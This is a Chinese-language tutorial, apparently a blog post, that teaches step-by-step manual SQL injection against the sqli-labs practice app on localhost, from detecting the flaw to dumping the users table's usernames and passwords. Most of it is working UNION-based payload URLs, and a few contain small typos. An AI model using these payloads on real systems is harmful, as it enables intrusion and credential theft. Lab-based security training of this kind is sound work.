前言
這篇文章就是一個最基本的SQl手工注入的過程了。基本上在sqlilabs上面的實驗,如果知道了其中的全部知識點,都可以通過以下的步驟進行脫褲。下面的這個步驟也是其他的脫褲手段的基礎。如果想要精通SQL注入,那么這個最基本的脫褲步驟是必須了解和掌握的。
為了方便說明,我們還是用之前的數字型的注入點為例來進行說明。
整體步驟:
1. 判斷是不是注入點
2.得到字段總數
3.得到顯示位
4.查選庫
5.查選表名
6.查選列名
7.脫褲(就是得到我們想得到列名的值)
1. 判斷是不是注入點
SQL注入漏洞的幾種判斷方法
①http://localhost/sqlilabs/Less-2/?id=1id'
②http://localhost/sqlilabs/Less-2/?id=1id and 1=1
③http://localhost/sqlilabs/Less-2/?id=1id and 1=2
如果執行①后,頁面上提示報錯或者提示數據庫錯誤的話,說明是存在注入漏洞的。
如果執行②后,頁面正常顯示,而執行③后,頁面報錯,那么說明這個頁面是存在注入漏洞的。
就說明http://localhost/sqlilabs/Less-2/?id=1id
2.得到字段總數
♦后台的SQL語句的寫法大致為:
select username,password,[....] from table where id=userinput
♦那么我們通過使用order by的語句來判斷select所查詢字段的數目。
那么payload變為:
http://localhost/sqlilabs/Less-2/?id=1 order by 1/2/3/4....
當使用order by 4時程序出錯,那么select的字段一共是3個。
3.得到顯示位
♦在頁面上會顯示從select中選取的字段,我們接下來就是要判斷顯示的字段是哪幾個字段。
使用如下的payload(兩者均可)進行判斷。
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,2,3 http://localhost/sqlilabs/Less-2/?id=1 and 1=2 union select 1,2,3
當使用個如上的payload時,頁面的顯示如下:
通過如上的頁面顯示就可以知道,頁面中顯示的是第2位和第3位的信息。
4.查選庫
♦在知道了顯示位之后,那么接下來就可以通過顯示位來顯示我們想知道的信息,如數據庫的版本,用戶信息等等。那么我們使用如下的payload就可以知道相關的信息。
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,version(),database()
此時頁面的顯示為:
那么接下來我們通過這種方式知道數據庫中所有的數據庫的名稱。
payload如下:
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,2,SCHEMA_NAME, from information_schema.SCHEMATA limit 0,1 #得到第一個庫名
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,2,SCHEMA_NAME, from information_schema.SCHEMATA limit 1,1 #得到第二個庫名
...
5.查選表名
♦由於database()返回的就是當前web程序所使用的數據庫名,那么我們就利用database()來查詢所有的表信息。當然在上一步中。我們也已經知道當前的database就是security。
那么我們構造的payload如下:
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()
這樣我們就得到當前數據庫下所有的表名了。頁面返回的結果是:
所以我們知道在當前的數據庫中存在4張表,分別是emails,referers,uagents,users。
6.查選列名
♦在知道了表名之后,接下來我們利用information_schema.columns就可以根據表名來獲取當前表中所有的字段。
payload如下:
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273(users的十六進制)
頁面的顯示結果如下:
通過這個語句,我們就知道在users表中存在USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password,id,name,password這些字段。但是我本地測試的測試的時候,這個存在一個問題,實際上在security數據庫的users的表中,只有id,username,password這3個字段,其他的字段都是其他數據庫的中users表的字段名。
通過上面的payload,我們也同樣可以知道在emails,referers,uagents中的字段名稱。
但是有的時候后台的代碼可能僅用了使用where子句,那么這個時候就無法通過information_schema.coumns來得到列名了,這個時候只能夠根據你自己多年的黑客經驗來進行猜解了。猜解的方法也是比較的簡單,使用exists子句就可以進行猜解了。假設在我們已經知道了表名的情況下(當然猜解表名也使用通過exists子句來完成)。
猜解的語句如下:
http://localhost/sqlilabs/Less-2/?id=1 and exists(select uname from users)
主要的語句就是exists(select 需要猜解的列名 from users)這種句式。如果在users表中不存在uname列名,則頁面不會顯示內容或者是直接出現sql的錯誤語句。
如下如所示:
下面這個就是猜解到了users表中存在的字段。
http://localhost/sqlilabs/Less-2/?id=1 and exists(select username from users)
猜測在users表中存在username列,上面的語句程序可以正常第返回結果,那么壽命在users表中確實存在username列名。
7.脫褲(就是得到我們想得到列名的值)
在知道了當前數據庫所有的表名和字段名之后,接下來我們就可以dump數據庫中所有的信息了。比如我們下載當前users表中所有的數據。
可以使用如下的payload:
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(username,password),3 from users
就可以得到users表中所有的username和password的數據了,通過這種方式也能夠得到其他表中的數據了。
總結:這就是sql注入的原理,但是你必須知道:
1.mysql的系統函數
2.了解下union
3.order by 用於對結果集進行排序
4.mysql數據庫重要四個數據庫庫:information_schema proformation_schema mysql test
5.三個重要數據表:table_name table_schema table_type
6.理解schema,schemata,schema_name,table_schema的含義很重要!很重要!很重要!(說三遍~)
這些我會在下來寫一下。